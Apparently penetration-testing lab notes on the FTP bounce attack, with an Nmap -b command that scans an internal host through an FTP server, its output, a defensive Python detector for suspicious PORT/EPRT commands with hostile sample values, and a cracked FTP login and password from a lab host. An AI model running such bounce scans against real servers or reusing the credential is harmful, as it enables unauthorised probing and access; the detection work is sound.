FTP Bounce Attack

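An FTP server can be made to bounce its traffic to an internal host: the client names a third-party address in the PORT command, and the server opens the data connection to that address on the client's behalf.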

https://www.geeksforgeeks.org/what-is-ftp-bounce-attack/

The Nmap -b flag can be used to perform an FTP bounce attack:

nmap -Pn -v -n -p80 -b <anonymous:[email protected]> 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to <ftp://anonymous:[email protected]:21>
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.

PORT   STATE SERVICE
80/tcp open  http
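
A defensive counterpart to the scan above, added here as an example (it is not part of the original notes or of Nmap): it reviews FTP control-channel commands and flags PORT/EPRT requests whose data target differs from the client's own address or points at a port below 1024. The function names and the client addresses 10.10.14.5 and 10.10.14.7 are assumptions made for the illustration.

```python
import ipaddress
import re

# PORT h1,h2,h3,h4,p1,p2 (RFC 959); EPRT |proto|addr|port| (RFC 2428)
PORT_RE = re.compile(r"^PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$", re.I)
EPRT_RE = re.compile(r"^EPRT\s+(.)([12])\1(.+?)\1(\d+)\1\s*$", re.I)

def parse_data_target(command):
    """Return (ip, port) named by a PORT/EPRT command, or None."""
    try:
        m = PORT_RE.match(command)
        if m:
            n = [int(x) for x in m.groups()]
            ip = ipaddress.ip_address(".".join(str(x) for x in n[:4]))
            return ip, n[4] * 256 + n[5]
        m = EPRT_RE.match(command)
        if m:
            return ipaddress.ip_address(m.group(3)), int(m.group(4))
    except ValueError:
        pass  # malformed address: not a usable data target
    return None

def find_bounce_attempts(events):
    """events: (control_peer_ip, raw_command) pairs -> list of findings."""
    findings = []
    for peer, command in events:
        target = parse_data_target(command)
        if target is None:
            continue
        ip, port = target
        reasons = []
        if ip != ipaddress.ip_address(peer):
            reasons.append("third-party address")
        if port < 1024:
            reasons.append("privileged port")
        if reasons:
            findings.append((peer, str(ip), port, reasons))
    return findings

# Constructed sample; only 172.17.0.2 comes from the scan output above.
SAMPLE_EVENTS = [
    ("10.10.14.5", "USER anonymous"),
    ("10.10.14.5", "PORT 10,10,14,5,195,80"),  # own address, port 50000
    ("10.10.14.5", "PORT 172,17,0,2,0,80"),    # data channel to 172.17.0.2:80
    ("10.10.14.5", "EPRT |1|172.17.0.2|22|"),
    ("10.10.14.7", "PORT 10,10,14,7,0,21"),    # own address, low port
]
if __name__ == "__main__":
    for finding in find_bounce_attempts(SAMPLE_EVENTS):
        print(finding)
```

Clients behind NAT can trip the address check legitimately, so treat it as a signal to review rather than proof. On vsftpd the server enforces the same address check itself unless port_promiscuous is set to YES.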

Writeup

Password:

[2121][ftp] host: 10.129.51.3   login: robin   password: 7iz4rnckjsduza7